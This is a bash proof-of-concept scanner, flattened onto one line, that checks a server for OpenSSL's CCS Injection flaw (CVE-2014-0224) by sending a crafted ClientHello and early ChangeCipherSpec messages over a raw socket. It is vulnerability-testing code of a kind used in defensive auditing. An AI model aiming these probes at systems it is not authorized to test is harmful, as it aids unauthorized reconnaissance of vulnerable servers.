#!/bin/bash # POC bash socket implementation of CCS Injection vulnerability in OpenSSL (CVE-2014-0224), see https://www.openssl.org/news/secadv_20140605.txt # Author: Dirk Wetter, GPLv2 see https://testssl.sh/LICENSE.txt # # sockets inspired by http://blog.chris007.de/?p=238 # mainly adapted from the C code from https://gist.github.com/rcvalle/71f4b027d61a78c42607 # thx Ramon de C Valle # ###### DON'T DO EVIL! USAGE AT YOUR OWN RISK. DON'T VIOLATE LAWS! ####### NODE="" SLEEP=2 DEBUG=${DEBUG:-0} [ -z "$1" ] && exit 1 # TLS 1.0=x01 1.1=0x02, 1.2=0x3 # the PoC contains per default only check for TLS1.0 as the is the least common denominator TLSV=${2:-x01} ccs_message="\x14\x03\tls_version\x00\x01\x01" ## ^^^^^^^ this is the thing! client_hello=" # TLS header ( 5 bytes) ,x16, # Content type (x16 for handshake) x03, tls_version, # TLS Version x00, x93, # Length # Handshake header x01, # Type (x01 for ClientHello) x00, x00, x8f, # Length x03, tls_version, # TLS Version # Random (32 byte) Unix time etc, see www.moserware.com/2009/06/first-few-milliseconds-of-https.html x53, x9c, xb2, xcb, x4b, x42, xf9, x2d, x0b, xe5, x9c, x21, xf5, xa3, x89, xca, x7a, xd9, xb4, xab, x3f, xd3, x22, x21, x5e, xc4, x65, x0d, x1e, xce, xed, xc2, x00, # Session ID length x00, x68, # Cipher suites length xc0, x13, xc0, x12, xc0, x11, xc0, x10, xc0, x0f, xc0, x0e, xc0, x0d, xc0, x0c, xc0, x0b, xc0, x0a, xc0, x09, xc0, x08, xc0, x07, xc0, x06, xc0, x05, xc0, x04, xc0, x03, xc0, x02, xc0, x01, x00, x39, x00, x38, x00, x37, x00, x36, x00, x35, x00, x34, x00, x33, x00, x32, x00, x31, x00, x30, x00, x2f, x00, x16, x00, x15, x00, x14, x00, x13, x00, x12, x00, x11, x00, x10, x00, x0f, x00, x0e, x00, x0d, x00, x0c, x00, x0b, x00, x0a, x00, x09, x00, x08, x00, x07, x00, x06, x00, x05, x00, x04, x00, x03, x00, x02, x00, x01, x01, x00" msg=`echo "$client_hello" | sed -e 's/# .*$//g' -e 's/,/\\\/g' | sed -e 's/ //g' | tr -d '\n'` parse_hn_port() { PORT=443 # unless otherwise auto-determined, see below NODE="$1" # strip "https", supposed it was supplied additionally echo $NODE | grep -q 'https://' && NODE=`echo $NODE | sed -e 's/https\:\/\///' ` # strip trailing urlpath NODE=`echo $NODE | sed -e 's/\/.*$//'` # determine port, supposed it was supplied additionally echo $NODE | grep -q ':' && PORT=`echo $NODE | sed 's/^.*\://'` && NODE=`echo $NODE | sed 's/\:.*$//'` } socksend() { data=`echo $1 | sed 's/tls_version/'"$2"'/g'` echo "\"$data\"" echo -en "$data" >&5 || return 1 sleep $SLEEP return 0 } sockread() { reply=`dd bs=$1 count=1 <&5 2>/dev/null` } ok_ids(){ echo tput bold; tput setaf 2; echo "ok -- something resetted our ccs packets"; tput sgr0 echo exit 0 } #### main parse_hn_port "$1" if ! exec 5<> /dev/tcp/$NODE/$PORT; then echo "`basename $0`: unable to connect to $NODE:$PORT" exit 2 fi # socket is now open with fd 5 echo "##### sending client hello:" socksend "$msg" $TLSV sleep 1 sockread 10000 echo -e "\n##### server hello\c" if test $DEBUG ; then echo ":" echo -e "$reply" | xxd -c32 | head -20 echo "[...]" echo fi echo "##### sending ccs injection with TLS version $TLSV:" socksend "$ccs_message" $TLSV || ok_ids sleep 1 socksend "$ccs_message" $TLSV || ok_ids sleep 1 sockread 65534 echo echo "###### reply: " echo -e "$reply" | xxd -c32 echo reply_sanitized=`echo -e "$reply" | xxd -p | tr -cd '[:print:]' | sed 's/^..........//'` test $DEBUG || echo $reply_sanitized lines=`echo -e "$reply" | xxd -c32 | wc -l` test $DEBUG || echo $lines if [ "$lines" -gt 1 ] || [ "$reply_sanitized" == "0a" ] ;then tput bold; tput setaf 2; echo "ok"; tput sgr0 ret=0 else tput bold; tput setaf 1; echo "VULNERABLE"; tput sgr0 ret=1 fi echo exit $ret # vim:tw=100:ts=5:sw=5 # $Id: ccs-injection.sh,v 1.4 2014/10/08 11:06:47 dirkw Exp $